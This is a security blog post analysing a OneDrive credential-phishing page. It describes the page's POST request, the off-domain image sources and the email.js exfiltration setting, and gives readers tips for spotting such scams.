Onedrive phishing scam analysis 2022

Published by Reza Rafati on

I have written this analysis for you. I hope that it will help you to get a better understanding of the Onedrive phishing attack and that it will help you to protect yourself and others from similar phishing attacks.

Cybercriminals have created phishing attacks aimed at the users of the cloud storage service Onedrive. They do this as it will allow the cybercriminals to gain access to the Microsoft account. Once access has been gained by stealing the credentials via the Onedrive phishing page — the criminals will have access to all of the tied Microsoft services. This includes email access.

Onedrive phishing scam

I navigated to the URLscan website and started searching for some active Onedrive phishing scams, I quickly found one which looked visually very clean.

The Onedrive phishing page

So I decided to take a look at the phishing page a little bit deeper. I got the Onedrive phishing details now and I can also take a look at the HTML source code.

From there I continued to navigate to the source code of the phishing page, I quickly started my search for for any “POST” requests. This allowed me to quickly see if something is in the page which has the funtion to send.

By finding the POST function, it was clear to me that data is being sent somewhere, and I have a big suspicion that it is not towards the official Microsoft service which handles login requests. Additionally, we can also see again that the cybercriminals are trying to scam their victims by claiming that the document is protected.

This document is protected, please input the email address document was shared with

Piece of text the cybercriminals used in the phishing attack

They state this in order to trick their victims into providing their login details. We can also notice that the images used in the phishing attack are actually loaded from servers that have nothing to do with Microsoft or Onedrive.

Onedrive logo being loaded from random website

I had to take a deeper look to actually find the piece of code that is responsible for sending away the data, and I noticed that the responsible one is email.js. You can view the harmless code here. There you can see there multiple options can be provided on how the phishing page should act. One of the options includes where the data should be sent.

Click on Email.js “Show response” to view the source code via URLscan

Tips to identify Onedrive phishing attacks

I hope that this technical quick view has helped you to identify Onedrive phishing pages. But just to be certain, I will list down some more tricks for you;

  • If the domain is not the official Onedrive domain, then simply close the window and leave that page
  • If you notice that in the source code, resources are being used which are not from the official Onedrive domain, then simply close the window

Urgent or final warnings

Many cybercriminals try to pressure you by using latest warnings or emergency notifications. An example of such a message is, for example, “This document is protected, please input the email address document was shared with”. Do not respond to this, but if in doubt, use the official site of the Onedrive service to login — as the shared document should be in there.

— thats it, but if you want, you can take a look at my quick URLscan threat hunting guide.

Share this information

Reza Rafati

Founder of Cyberwarzone.com.